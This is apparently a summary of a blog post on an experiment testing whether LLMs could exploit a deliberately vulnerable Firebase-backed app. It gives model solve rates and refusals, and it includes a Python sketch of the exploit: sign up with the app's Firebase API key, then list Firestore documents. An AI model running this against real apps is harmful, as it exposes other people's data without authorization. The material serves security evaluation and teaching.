I built a vulnerable app and spent $1,500 seeing if LLMs could hack it

3 hours ago
  • #Firebase Exploit
  • #AI Evaluation
  • #LLM Security Testing
  • The author built a deliberately vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test whether LLMs could exploit common security flaws.
  • The exploit used the Firebase credentials shipped in the app to sign up directly and read Firestore, bypassing the otherwise secure API. This is a common real-world issue.
  • GPT-5.5 had the highest solve rate (7/10) and focused quickly on Firebase; other models solved it less often, including DeepSeek V4 Pro (3/10) and Claude variants (2/10).
  • Several models (e.g., Gemini 3.1 Pro Preview, DeepSeek V4 Flash) failed because of refusals or misdirected effort, with some fixating on API exploits instead of Firebase.
  • The experiment cost $1,500 and surfaced challenges such as model guardrails, high costs with some providers, and technical hurdles in running the evaluation harness.
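
The exploit path in the summary above (sign up with the app's Firebase credentials, then read Firestore directly) can be sketched with Firebase's public REST endpoints. This is a minimal illustration, not the author's harness: the API key, project ID, email, and the `users` collection name are hypothetical placeholders, and it should only be run against a project you own. Whether the read succeeds depends on the project's Firestore security rules.

```python
import json
import urllib.request

# Public Firebase REST endpoints (Identity Toolkit and Firestore).
IDENTITY_URL = "https://identitytoolkit.googleapis.com/v1/accounts:signUp"
FIRESTORE_URL = (
    "https://firestore.googleapis.com/v1/projects/{project}"
    "/databases/(default)/documents/{collection}"
)


def build_signup_request(api_key, email, password):
    """Build an email/password sign-up request using the app's web API key."""
    body = json.dumps(
        {"email": email, "password": password, "returnSecureToken": True}
    ).encode("utf-8")
    return urllib.request.Request(
        f"{IDENTITY_URL}?key={api_key}",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def build_firestore_list_request(project_id, collection, id_token):
    """Build a request that lists documents in a collection as the new user."""
    url = FIRESTORE_URL.format(project=project_id, collection=collection)
    return urllib.request.Request(
        url,
        headers={"Authorization": f"Bearer {id_token}"},
        method="GET",
    )


def send(request):
    """Send a prepared request and decode the JSON response."""
    with urllib.request.urlopen(request) as resp:
        return json.loads(resp.read().decode("utf-8"))


if __name__ == "__main__":
    # Placeholder values (assumptions); replace with your own test project's.
    signup = build_signup_request("YOUR_API_KEY", "tester@example.com", "a-long-password")
    print(signup.get_method(), signup.full_url)
    # Against a real project you own, the flow would continue like this:
    # token = send(signup)["idToken"]
    # docs = send(build_firestore_list_request("your-project-id", "users", token))
```

If the second request returns documents, the Firestore rules are granting reads to any authenticated user, which is the gap that lets a client skip the backend API entirely.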